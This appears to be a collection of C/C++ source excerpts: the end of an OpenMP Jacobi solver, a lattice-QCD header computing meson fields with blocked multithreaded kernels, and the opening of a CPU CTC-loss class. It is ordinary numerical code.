for (j = 0; j < m; j++)
uold[i][j] = u[i][j];
#pragma omp parallel for private(resid) reduction(+:error)
for (i = 1; i < (n - 1); i++)
#pragma omp parallel for private(resid) reduction(+:error)
for (j = 1; j < (m - 1); j++)
{
resid = (ax * (uold[i - 1][j] + uold[i + 1][j])
+ ay * (uold[i][j - 1] + uold[i][j + 1]) +
b * uold[i][j] - f[i][j]) / b;
u[i][j] = uold[i][j] - omega * resid;
error = error + resid * resid;
}
/* omp end parallel */
/* Error check */
k = k + 1;
error = sqrt (error) / (n * m);
} /* End iteration loop */
printf ("Total Number of Iterations:%d\n", k);
printf ("Residual:%E\n", error);
}
int main()
{
initialize();
jacobi();
return 0;
}
|
mesonfield_compute_impl.h | //Meson field computation code
#ifndef _MESONFIELD_COMPUTE_IMPL
#define _MESONFIELD_COMPUTE_IMPL
//For all mode indices l_i and r_j, compute the meson field \sum_p l_i^\dagger(p,t) M(p,t) r_j(p,t)
//It is assumed that A2AfieldL and A2AfieldR are Fourier transformed field containers
//M(p,t) is a completely general momentum-space spin/color/flavor matrix per temporal slice
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR>
template<typename InnerProduct>
void A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>::compute(const A2AfieldL<mf_Policies> &l, const InnerProduct &M, const A2AfieldR<mf_Policies> &r, const int &t, bool do_setup){
if(do_setup) setup(l,r,t,t); //both vectors have same timeslice
else zero();
if(!UniqueID()) printf("Starting A2AmesonField::compute timeslice %d with %d threads\n",t, omp_get_max_threads());
double time = -dclock();
//For W vectors we dilute out the flavor index in-place while performing this contraction
const typename mf_Policies::FermionFieldType &mode0 = l.getMode(0);
const int size_3d = mode0.nodeSites(0)*mode0.nodeSites(1)*mode0.nodeSites(2);
if(mode0.nodeSites(3) != GJP.TnodeSites()) ERR.General("A2AmesonField","compute","Not implemented for fields where node time dimension != GJP.TnodeSites()\n");
int nl_l = lindexdilution.getNl();
int nl_r = rindexdilution.getNl();
int t_lcl = t-GJP.TnodeCoor()*GJP.TnodeSites();
if(t_lcl >= 0 && t_lcl < GJP.TnodeSites()){ //if timeslice is on-node
#pragma omp parallel for
for(int i = 0; i < nmodes_l; i++){
cps::ComplexD mf_accum;
modeIndexSet i_high_unmapped; if(i>=nl_l) lindexdilution.indexUnmap(i-nl_l,i_high_unmapped);
for(int j = 0; j < nmodes_r; j++) {
modeIndexSet j_high_unmapped; if(j>=nl_r) rindexdilution.indexUnmap(j-nl_r,j_high_unmapped);
mf_accum = 0.;
for(int p_3d = 0; p_3d < size_3d; p_3d++) {
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> lscf = l.getFlavorDilutedVect(i,i_high_unmapped,p_3d,t_lcl); //dilute flavor in-place if it hasn't been already
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> rscf = r.getFlavorDilutedVect(j,j_high_unmapped,p_3d,t_lcl);
mf_accum += M(lscf,rscf,p_3d,t); //produces double precision output by spec
}
(*this)(i,j) = mf_accum; //downcast after accumulate
}
}
}
sync();
print_time("A2AmesonField","local compute",time + dclock());
time = -dclock();
//Sum over all nodes so all nodes have a copy
nodeSum();
print_time("A2AmesonField","nodeSum",time + dclock());
}
//Compute meson fields for all timeslices. This version is more efficient on multiple nodes
#ifdef AVX512
CPS_END_NAMESPACE
#include<simd/Intel512common.h>
CPS_START_NAMESPACE
#endif
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename mf_Element, typename mf_Element_Vector>
class MultKernel{
public:
inline static void prefetchSite(const SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &lscf,
const SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &rscf){
#ifdef AVX512
_mm_prefetch((const char*)lscf.getPtr(0),_MM_HINT_T0);
_mm_prefetch((const char*)lscf.getPtr(1),_MM_HINT_T0);
_mm_prefetch((const char*)rscf.getPtr(0),_MM_HINT_T0);
_mm_prefetch((const char*)rscf.getPtr(1),_MM_HINT_T0);
#endif
}
#ifdef AVX512
static void prefetchFvec(const char* ptr){
//T0 hint
#define _VPREFETCH1(O,A) VPREFETCH1(O,A)
//T1 hint
#define _VPREFETCH2(O,A) VPREFETCH2(O,A)
__asm__ (
_VPREFETCH2(0,%rdi) \
_VPREFETCH2(1,%rdi) \
_VPREFETCH2(2,%rdi) \
_VPREFETCH2(3,%rdi) \
_VPREFETCH2(4,%rdi) \
_VPREFETCH2(5,%rdi) \
_VPREFETCH2(6,%rdi) \
_VPREFETCH2(7,%rdi) \
_VPREFETCH2(8,%rdi) \
_VPREFETCH2(9,%rdi) \
_VPREFETCH2(10,%rdi) \
_VPREFETCH2(11,%rdi)
);
}
#endif
inline static void prefetchAdvanceSite(SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &lscf,
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &rscf,
const std::pair<int,int> &site_offset_i, const std::pair<int,int> &site_offset_j){
#ifdef AVX512
lscf.incrementPointers(site_offset_i);
prefetchFvec((const char*)lscf.getPtr(0));
prefetchFvec((const char*)lscf.getPtr(1));
//_mm_prefetch((const char*)lscf.getPtr(0),_MM_HINT_T0);
//_mm_prefetch((const char*)lscf.getPtr(1),_MM_HINT_T0);
rscf.incrementPointers(site_offset_j);
prefetchFvec((const char*)rscf.getPtr(0));
prefetchFvec((const char*)rscf.getPtr(1));
//_mm_prefetch((const char*)rscf.getPtr(0),_MM_HINT_T0);
//_mm_prefetch((const char*)rscf.getPtr(1),_MM_HINT_T0);
lscf.incrementPointers(site_offset_i,-1);
rscf.incrementPointers(site_offset_j,-1);
#endif
}
inline static int prefetchSitesL2(SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &lscf,
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &rscf){
#ifdef AVX512
_mm_prefetch((const char*)lscf.getPtr(0),_MM_HINT_T1);
_mm_prefetch((const char*)lscf.getPtr(1),_MM_HINT_T1);
_mm_prefetch((const char*)rscf.getPtr(0),_MM_HINT_T1);
_mm_prefetch((const char*)rscf.getPtr(1),_MM_HINT_T1);
return 5; //number of sites between calls
#endif
}
//Lowest level of blocked matrix mult. Ideally this should fit in L1 cache.
template<typename InnerProduct>
static void mult_kernel(std::vector<mf_Element_Vector> &mf_accum_m, const InnerProduct &M, const int t,
const int i0, const int iup, const int j0, const int jup, const int p0, const int pup,
const std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > &base_ptrs_i,
const std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > &base_ptrs_j,
const std::vector<std::pair<int,int> > &site_offsets_i,
const std::vector<std::pair<int,int> > &site_offsets_j){
for(int i = i0; i < iup; i++){
for(int j = j0; j < jup; j++) {
mf_Element &mf_accum = mf_accum_m[i][j];
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> lscf(base_ptrs_i[i], site_offsets_i[i], p0);
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> rscf(base_ptrs_j[j], site_offsets_j[j], p0);
//prefetchSite(lscf,rscf);
//prefetchSitesL2(lscf,rscf);
//int L2prefetchFreq = 1;
//int iter = 0;
for(int p_3d = p0; p_3d < pup; p_3d++) {
//if(iter % L2prefetchFreq == 0) L2prefetchFreq = prefetchSitesL2(lscf,rscf);
//prefetchAdvanceSite(lscf,rscf,site_offsets_i[i],site_offsets_j[j]);
M(mf_accum,lscf,rscf,p_3d,t);
lscf.incrementPointers(site_offsets_i[i]);
rscf.incrementPointers(site_offsets_j[j]);
//++iter;
}
}
}
}
//Do a second layer of blocked dgemm to try to fit in the L1 cache
//note the i0, iup, etc are the low and high range limits from the outer blocking
template<typename InnerProduct>
static void inner_block_mult(std::vector<mf_Element_Vector> &mf_accum_m, const InnerProduct &M, const int t,
const int i0, const int iup, const int j0, const int jup, const int p0, const int pup,
const std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > &base_ptrs_i,
const std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > &base_ptrs_j,
const std::vector<std::pair<int,int> > &site_offsets_i,
const std::vector<std::pair<int,int> > &site_offsets_j){
const int bii = BlockedMesonFieldArgs::bii;
const int bjj = BlockedMesonFieldArgs::bjj;
const int bpp = BlockedMesonFieldArgs::bpp;
for(int ii0=i0; ii0 < iup; ii0+=bii){
int iiup = std::min(ii0+bii,iup);
for(int jj0=j0; jj0 < jup; jj0+=bjj){
int jjup = std::min(jj0+bjj,jup);
for(int pp0=p0; pp0 < pup; pp0+=bpp){
int ppup = std::min(pp0+bpp,pup);
MultKernel<mf_Policies,A2AfieldL,A2AfieldR,mf_Element,mf_Element_Vector>::mult_kernel(mf_accum_m, M, t,
ii0, iiup, jj0, jjup, pp0, ppup,
base_ptrs_i, base_ptrs_j, site_offsets_i, site_offsets_j);
}
}
}
}
};
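//A minimal, self-contained sketch of the tiling idiom used by
//inner_block_mult above (hypothetical names, not part of this header): the
//(i,j,p) iteration space is cut into bi*bj*bp tiles so that each kernel
//invocation touches a working set small enough to stay in cache.
//
// for (int i0 = 0; i0 < ni; i0 += bi)
//   for (int j0 = 0; j0 < nj; j0 += bj)
//     for (int p0 = 0; p0 < np; p0 += bp)
//       kernel(i0, std::min(i0 + bi, ni),
//              j0, std::min(j0 + bj, nj),
//              p0, std::min(p0 + bp, np)); //one tile per call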
//Policies for single and multi-src outputs
//Single src
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename Allocator, typename InnerProduct>
struct SingleSrcVectorPolicies{
typedef std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator > mfVectorType;
typedef cps::ComplexD mf_Element;
typedef std::vector<mf_Element> mf_Element_Vector;
static inline void setupPolicy(const InnerProduct &M){ assert(M.mfPerTimeSlice() == 1); }
static inline void initializeElement(mf_Element &e){ e = mf_Element(0.); }
static void initializeMesonFields(mfVectorType &mf_t, const A2AfieldL<mf_Policies> &l, const A2AfieldR<mf_Policies> &r, const int Lt, const bool do_setup){
mf_t.resize(Lt);
for(int t=0;t<Lt;t++)
if(do_setup) mf_t[t].setup(l,r,t,t); //both vectors have same timeslice (zeroes the starting matrix)
else{
assert(mf_t[t].ptr() != NULL);
mf_t[t].zero();
}
}
static inline void sumThreadedResults(mfVectorType &mf_t, const std::vector<std::vector<mf_Element_Vector> > &mf_accum_thr, const int i, const int j, const int t, const int nthread){
for(int thr=0;thr<nthread;thr++)
mf_t[t](i,j) += mf_accum_thr[thr][i][j];
}
//Used to get information about rows and cols
static inline const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & getReferenceMf(const mfVectorType &mf_t, const int t){
return mf_t[t];
}
static inline void nodeSum(mfVectorType &mf_t, const int Lt){
for(int t=0; t<Lt; t++) mf_t[t].nodeSum();
}
static inline void printElement(const mf_Element &e){
std::cout << "(" << e.real() << "," << e.imag() << ")";
}
};
//Multisrc
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename Allocator, typename InnerProduct>
struct MultiSrcVectorPolicies{
int mfPerTimeSlice;
typedef std::vector< std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator >* > mfVectorType; //indexed by [srcidx][t]
typedef std::vector<cps::ComplexD> mf_Element;
typedef std::vector<mf_Element> mf_Element_Vector;
inline void setupPolicy(const InnerProduct &M){
mfPerTimeSlice = M.mfPerTimeSlice();
}
inline void initializeElement(mf_Element &e){ e.resize(mfPerTimeSlice, cps::ComplexD(0.)); }
void initializeMesonFields(mfVectorType &mf_st, const A2AfieldL<mf_Policies> &l, const A2AfieldR<mf_Policies> &r, const int Lt, const bool do_setup) const{
if(mf_st.size() != (size_t)mfPerTimeSlice) ERR.General("mf_Vector_policies <multi src>","initializeMesonFields","Expect output vector to be of size %d, got size %d\n",mfPerTimeSlice,(int)mf_st.size());
for(int s=0;s<mfPerTimeSlice;s++){
mf_st[s]->resize(Lt);
for(int t=0;t<Lt;t++)
if(do_setup) mf_st[s]->operator[](t).setup(l,r,t,t); //both vectors have same timeslice (zeroes the starting matrix)
else{
assert(mf_st[s]->operator[](t).ptr() != NULL);
mf_st[s]->operator[](t).zero();
}
}
}
inline void sumThreadedResults(mfVectorType &mf_st, const std::vector<std::vector<mf_Element_Vector> > &mf_accum_thr, const int i, const int j, const int t, const int nthread) const{
for(int thr=0;thr<nthread;thr++)
for(int s=0;s<mfPerTimeSlice;s++)
mf_st[s]->operator[](t)(i,j) += mf_accum_thr[thr][i][j][s];
}
//Used to get information about rows and cols
inline const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & getReferenceMf(const mfVectorType &mf_st, const int t) const{
return mf_st[0]->operator[](t);
}
inline void nodeSum(mfVectorType &mf_st, const int Lt) const{
for(int s=0;s<mfPerTimeSlice;s++)
for(int t=0; t<Lt; t++) mf_st[s]->operator[](t).nodeSum();
}
inline void printElement(const mf_Element &e) const{
for(int i=0;i<mfPerTimeSlice;i++) std::cout << i << ":(" << e[i].real() << "," << e[i].imag() << ") ";
}
};
#ifdef USE_GRID
//Single src vectorized with delayed reduction
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename Allocator, typename InnerProduct>
struct SingleSrcVectorPoliciesSIMD{
typedef std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator > mfVectorType;
typedef Grid::vComplexD mf_Element;
typedef Grid::Vector<mf_Element> mf_Element_Vector;
static inline void setupPolicy(const InnerProduct &M){ assert(M.mfPerTimeSlice() == 1); }
static inline void initializeElement(mf_Element &e){ zeroit(e); }
static void initializeMesonFields(mfVectorType &mf_t, const A2AfieldL<mf_Policies> &l, const A2AfieldR<mf_Policies> &r, const int Lt, const bool do_setup){
mf_t.resize(Lt);
for(int t=0;t<Lt;t++)
if(do_setup) mf_t[t].setup(l,r,t,t); //both vectors have same timeslice (zeroes the starting matrix)
else{
assert(mf_t[t].ptr() != NULL);
mf_t[t].zero();
}
}
static inline void sumThreadedResults(mfVectorType &mf_t, const std::vector<std::vector<mf_Element_Vector> > &mf_accum_thr, const int i, const int j, const int t, const int nthread){
mf_Element tmp = mf_accum_thr[0][i][j];
for(int thr=1;thr<nthread;thr++) tmp += mf_accum_thr[thr][i][j];
mf_t[t](i,j) += Reduce(tmp);
}
//Used to get information about rows and cols
static inline const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & getReferenceMf(const mfVectorType &mf_t, const int t){
return mf_t[t];
}
static inline void nodeSum(mfVectorType &mf_t, const int Lt){
for(int t=0; t<Lt; t++) mf_t[t].nodeSum();
}
static inline void printElement(const mf_Element &e){
}
};
//Multisrc with delayed reduction
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename Allocator, typename InnerProduct>
struct MultiSrcVectorPoliciesSIMD{
int mfPerTimeSlice;
typedef std::vector< std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator >* > mfVectorType; //indexed by [srcidx][t]
typedef Grid::Vector<Grid::vComplexD> mf_Element;
typedef std::vector<mf_Element> mf_Element_Vector;
inline void setupPolicy(const InnerProduct &M){
mfPerTimeSlice = M.mfPerTimeSlice();
}
inline void initializeElement(mf_Element &e){
e.resize(mfPerTimeSlice);
for(int i=0;i<mfPerTimeSlice;i++) zeroit(e[i]);
}
void initializeMesonFields(mfVectorType &mf_st, const A2AfieldL<mf_Policies> &l, const A2AfieldR<mf_Policies> &r, const int Lt, const bool do_setup) const{
if(mf_st.size() != (size_t)mfPerTimeSlice) ERR.General("mf_Vector_policies <multi src>","initializeMesonFields","Expect output vector to be of size %d, got size %d\n",mfPerTimeSlice,(int)mf_st.size());
for(int s=0;s<mfPerTimeSlice;s++){
mf_st[s]->resize(Lt);
for(int t=0;t<Lt;t++)
if(do_setup) mf_st[s]->operator[](t).setup(l,r,t,t); //both vectors have same timeslice (zeroes the starting matrix)
else{
assert(mf_st[s]->operator[](t).ptr() != NULL);
mf_st[s]->operator[](t).zero();
}
}
}
inline void sumThreadedResults(mfVectorType &mf_st, const std::vector<std::vector<mf_Element_Vector> > &mf_accum_thr, const int i, const int j, const int t, const int nthread) const{
mf_Element tmp(mfPerTimeSlice);
for(int s=0;s<mfPerTimeSlice;s++) tmp[s] = mf_accum_thr[0][i][j][s];
for(int thr=1;thr<nthread;thr++)
for(int s=0;s<mfPerTimeSlice;s++)
tmp[s] += mf_accum_thr[thr][i][j][s];
for(int s=0;s<mfPerTimeSlice;s++)
mf_st[s]->operator[](t)(i,j) += Reduce(tmp[s]);
}
//Used to get information about rows and cols
inline const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & getReferenceMf(const mfVectorType &mf_st, const int t) const{
return mf_st[0]->operator[](t);
}
inline void nodeSum(mfVectorType &mf_st, const int Lt) const{
for(int s=0;s<mfPerTimeSlice;s++)
for(int t=0; t<Lt; t++) mf_st[s]->operator[](t).nodeSum();
}
inline void printElement(const mf_Element &e) const{
//for(int i=0;i<mfPerTimeSlice;i++) std::cout << i << ":(" << e[i].real() << "," << e[i].imag() << ") ";
}
};
#endif
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename InnerProduct, typename mfVectorPolicies>
struct mfComputeGeneral: public mfVectorPolicies{
typedef typename mfVectorPolicies::mfVectorType mfVectorType;
void compute(mfVectorType &mf_t, const A2AfieldL<mf_Policies> &l, const InnerProduct &M, const A2AfieldR<mf_Policies> &r, bool do_setup){
typedef typename mfVectorPolicies::mf_Element mf_Element;
typedef typename mfVectorPolicies::mf_Element_Vector mf_Element_Vector;
this->setupPolicy(M);
const int Lt = GJP.Tnodes()*GJP.TnodeSites();
if(!UniqueID()) printf("Starting A2AmesonField::compute (blocked) for %d timeslices with %d threads\n",Lt, omp_get_max_threads());
#ifdef KNL_OPTIMIZATIONS
if(!UniqueID()) printf("Using KNL optimizations\n");
#else
if(!UniqueID()) printf("NOT using KNL optimizations\n");
#endif
double time = -dclock();
this->initializeMesonFields(mf_t,l,r,Lt,do_setup);
print_time("A2AmesonField","setup",time + dclock());
time = -dclock();
//For W vectors we dilute out the flavor index in-place while performing this contraction
const typename mf_Policies::FermionFieldType &mode0 = l.getMode(0);
const int size_3d = mode0.nodeSites(0)*mode0.nodeSites(1)*mode0.nodeSites(2);
if(mode0.nodeSites(3) != GJP.TnodeSites()) ERR.General("A2AmesonField","compute","Not implemented for fields where node time dimension != GJP.TnodeSites()\n");
//Each node only works on its time block
for(int t=GJP.TnodeCoor()*GJP.TnodeSites(); t<(GJP.TnodeCoor()+1)*GJP.TnodeSites(); t++){
const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & mf_ref = this->getReferenceMf(mf_t,t); //assumes all meson fields of the mf_Element type have the same mode parameters
double ttime = -dclock();
const int nl_l = mf_ref.getRowParams().getNl();
const int nl_r = mf_ref.getColParams().getNl();
const int nmodes_l = mf_ref.getNrows();
const int nmodes_r = mf_ref.getNcols();
int t_lcl = t-GJP.TnodeCoor()*GJP.TnodeSites();
const int bi = BlockedMesonFieldArgs::bi;
const int bj = BlockedMesonFieldArgs::bj;
const int bp = BlockedMesonFieldArgs::bp;
int nthread = omp_get_max_threads();
std::vector<std::vector<mf_Element_Vector> > mf_accum_thr(nthread); //indexed by [thread][i][j]
for(int thr=0;thr<nthread;thr++){
mf_accum_thr[thr].resize(nmodes_l);
for(int i=0;i<nmodes_l;i++){
mf_accum_thr[thr][i].resize(nmodes_r);
for(int j=0;j<nmodes_r;j++)
this->initializeElement(mf_accum_thr[thr][i][j]);
}
}
//Make a table of p base pointers and site offsets for each i,j
std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > base_ptrs_i(nmodes_l);
std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > base_ptrs_j(nmodes_r);
std::vector<std::pair<int,int> > site_offsets_i(nmodes_l);
std::vector<std::pair<int,int> > site_offsets_j(nmodes_r);
__SSC_MARK(0x1);
#pragma omp parallel
{
int me = omp_get_thread_num();
//Generate the tables
int thr_tabwork, thr_taboff;
thread_work(thr_tabwork, thr_taboff, nmodes_l, me, omp_get_num_threads());
for(int i=thr_taboff; i<thr_taboff+thr_tabwork;i++){ //i table
modeIndexSet i_high_unmapped; if(i>=nl_l) mf_ref.getRowParams().indexUnmap(i-nl_l,i_high_unmapped);
base_ptrs_i[i] = l.getFlavorDilutedVect(i,i_high_unmapped,0,t_lcl);
site_offsets_i[i] = std::pair<int,int>( l.siteStride3D(i,i_high_unmapped,0), l.siteStride3D(i,i_high_unmapped,1) );
}
thread_work(thr_tabwork, thr_taboff, nmodes_r, me, omp_get_num_threads());
for(int j=thr_taboff; j<thr_taboff+thr_tabwork;j++){ //j table
modeIndexSet j_high_unmapped; if(j>=nl_r) mf_ref.getColParams().indexUnmap(j-nl_r,j_high_unmapped);
base_ptrs_j[j] = r.getFlavorDilutedVect(j,j_high_unmapped,0,t_lcl);
site_offsets_j[j] = std::pair<int,int>( r.siteStride3D(j,j_high_unmapped,0), r.siteStride3D(j,j_high_unmapped,1) );
}
#pragma omp barrier
for(int i0 = 0; i0 < nmodes_l; i0+=bi){
int iup = std::min(i0+bi,nmodes_l);
for(int j0 = 0; j0< nmodes_r; j0+=bj) {
int jup = std::min(j0+bj,nmodes_r);
for(int p0 = 0; p0 < size_3d; p0+=bp){
int pup = std::min(p0+bp,size_3d);
int thr_pwork, thr_poff;
thread_work(thr_pwork, thr_poff, pup-p0, me, omp_get_num_threads());
int thr_p0 = p0 + thr_poff;
#ifdef USE_INNER_BLOCKING
MultKernel<mf_Policies,A2AfieldL,A2AfieldR,mf_Element,mf_Element_Vector>::inner_block_mult(mf_accum_thr[me], M, t,
i0, iup, j0, jup, thr_p0, thr_p0+thr_pwork,
base_ptrs_i, base_ptrs_j, site_offsets_i, site_offsets_j);
#else
MultKernel<mf_Policies,A2AfieldL,A2AfieldR,mf_Element,mf_Element_Vector>::mult_kernel(mf_accum_thr[me], M, t,
i0, iup, j0, jup, thr_p0, thr_p0+thr_pwork,
base_ptrs_i, base_ptrs_j, site_offsets_i, site_offsets_j);
#endif
}
}
}
#pragma omp barrier
const int nthread = omp_get_num_threads();
const int ijwork = nmodes_l * nmodes_r;
int thr_ijwork, thr_ijoff;
thread_work(thr_ijwork, thr_ijoff, ijwork, me, nthread);
for(int ij=thr_ijoff; ij<thr_ijoff + thr_ijwork; ij++){ //ij = j + mf_t[t].nmodes_r * i
int i=ij / nmodes_r;
int j=ij % nmodes_r;
this->sumThreadedResults(mf_t,mf_accum_thr,i,j,t,nthread);
}
}//end of parallel region
__SSC_MARK(0x2);
std::ostringstream os; os << "timeslice " << t << " from range " << GJP.TnodeCoor()*GJP.TnodeSites() << " to " << (GJP.TnodeCoor()+1)*GJP.TnodeSites()-1 << " : " << nmodes_l << "*" << nmodes_r << " modes and inner p loop of size " << size_3d << " divided over " << omp_get_max_threads() << " threads";
print_time("A2AmesonField",os.str().c_str(),ttime + dclock());
}
print_time("A2AmesonField","local compute",time + dclock());
time = -dclock();
sync();
print_time("A2AmesonField","sync",time + dclock());
//Accumulate
time = -dclock();
this->nodeSum(mf_t,Lt);
print_time("A2AmesonField","nodeSum",time + dclock());
}
};
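//The parallel pattern in compute() above is "privatize, then reduce": each
//thread accumulates into its own mf_accum_thr[thread] slab with no sharing,
//and only after a barrier are the per-thread slabs summed into the shared
//meson fields. A stripped-down sketch of the same idiom (hypothetical names,
//not from this file):
//
// std::vector<double> acc(omp_get_max_threads(), 0.0);
// #pragma omp parallel
// {
//   int me = omp_get_thread_num();
//   #pragma omp for
//   for (int i = 0; i < N; i++) acc[me] += work(i); //thread-local, no race
// }
// double total = std::accumulate(acc.begin(), acc.end(), 0.0); //reduce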
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename InnerProduct, typename Allocator, typename ComplexClass>
struct _choose_vector_policies{};
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename InnerProduct, typename Allocator>
struct _choose_vector_policies<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct,Allocator,complex_double_or_float_mark>{
typedef SingleSrcVectorPolicies<mf_Policies, A2AfieldL, A2AfieldR, Allocator, InnerProduct> SingleSrcVectorPoliciesT;
typedef MultiSrcVectorPolicies<mf_Policies, A2AfieldL, A2AfieldR, Allocator, InnerProduct> MultiSrcVectorPoliciesT;
};
#ifdef USE_GRID
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename InnerProduct, typename Allocator>
struct _choose_vector_policies<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct,Allocator,grid_vector_complex_mark>{
typedef SingleSrcVectorPoliciesSIMD<mf_Policies, A2AfieldL, A2AfieldR, Allocator, InnerProduct> SingleSrcVectorPoliciesT;
typedef MultiSrcVectorPoliciesSIMD<mf_Policies, A2AfieldL, A2AfieldR, Allocator, InnerProduct> MultiSrcVectorPoliciesT;
};
#endif
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR>
template<typename InnerProduct, typename Allocator>
void A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>::compute(std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator > &mf_t,
const A2AfieldL<mf_Policies> &l, const InnerProduct &M, const A2AfieldR<mf_Policies> &r, bool do_setup){
typedef typename _choose_vector_policies<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct,Allocator, typename ComplexClassify<typename mf_Policies::ComplexType>::type>::SingleSrcVectorPoliciesT VectorPolicies;
mfComputeGeneral<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct, VectorPolicies> cg;
cg.compute(mf_t,l,M,r,do_setup);
}
//Version of the above for multi-src inner products (output vector indexed by [src idx][t])
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR>
template<typename InnerProduct, typename Allocator>
void A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>::compute(std::vector< std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator >* > &mf_st,
const A2AfieldL<mf_Policies> &l, const InnerProduct &M, const A2AfieldR<mf_Policies> &r, bool do_setup){
typedef typename _choose_vector_policies<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct,Allocator, typename ComplexClassify<typename mf_Policies::ComplexType>::type>::MultiSrcVectorPoliciesT VectorPolicies;
mfComputeGeneral<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct, VectorPolicies> cg;
cg.compute(mf_st,l,M,r,do_setup);
}
#endif
|
cpu_ctc.h | #pragma once
#include <tuple>
#include <cmath>
#include <limits>
#include <algorithm>
#include <numeric>
#if !defined(CTC_DISABLE_OMP) && !defined(APPLE)
#include <omp.h>
#endif
#include "ctc_helper.h"
template<typename ProbT>
class CpuCTC {
public:
// Noncopyable
CpuCTC(int alphabet_size, int minibatch, void* workspace, int num_threads,
int blank_label) :
alphabet_size_(alphabet_size), minibatch_(minibatch),
num_threads_(num_threads), workspace_(workspace),
blank_label_(blank_label) {
#if defined(CTC_DISABLE_OMP) || defined(APPLE)
#else
if (num_threads > 0) {
omp_set_num_threads(num_threads);
} else {
num_threads_ = omp_get_max_threads();
}
#endif
}
CpuCTC(const CpuCTC&) = delete;
CpuCTC& operator=(const CpuCTC&) = delete;
ctcStatus_t cost_and_grad(const ProbT* const probs,
ProbT *grads,
ProbT* costs,
const int* const flat_labels,
const int* const label_lengths,
const int* const input_lengths);
ctcStatus_t score_forward(const ProbT* const probs,
ProbT* costs,
const int* const flat_labels,
const int* const label_lengths,
const int* const input_lengths);
private:
class CpuCTC_metadata {
private:
int setup_labels(const int* const labels, int blank_label, int L, int S);
public:
CpuCTC_metadata(int L, int S, int T, int mb, int alphabet_size,
void* workspace, size_t bytes_used, int blank_label,
const int* const labels);
ProbT* alphas;
ProbT* betas;
int* labels_w_blanks;
int* e_inc;
int* s_inc;
ProbT* output;
int repeats;
};
int alphabet_size_; // Number of characters plus blank
int minibatch_;
int num_threads_;
int blank_label_;
void* workspace_;
std::tuple<ProbT, bool>
cost_and_grad_kernel(ProbT *grad, const ProbT* const probs,
const int* const labels, int T, int L,
int mb, size_t bytes_used);
ProbT compute_alphas(const ProbT* probs, int repeats, int S, int T,
const int* const e_inc,
const int* const s_inc,
const int* const labels,
ProbT* alphas);
ProbT compute_betas_and_grad(ProbT* grad, const ProbT* const probs,
ProbT log_partition, int repeats,
int S, int T, const int* const e_inc,
const int* const s_inc,
const int* const labels,
ProbT* alphas,
ProbT* betas,
ProbT* output);
};
template<typename ProbT>
CpuCTC<ProbT>::CpuCTC_metadata::CpuCTC_metadata(int L, int S, int T, int mb,
int alphabet_size,
void* workspace, size_t bytes_used,
int blank_label,
const int* const labels) {
alphas = reinterpret_cast<ProbT *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(ProbT) * S * T;
std::fill(alphas, alphas + S * T, ctc_helper::neg_inf<ProbT>());
betas = reinterpret_cast<ProbT *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(ProbT) * S;
std::fill(betas, betas + S, ctc_helper::neg_inf<ProbT>());
labels_w_blanks = reinterpret_cast<int *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(int) * S;
e_inc = reinterpret_cast<int *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(int) * S;
s_inc = reinterpret_cast<int *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(int) * S;
output = reinterpret_cast<ProbT *>(static_cast<char *>(workspace) + bytes_used);
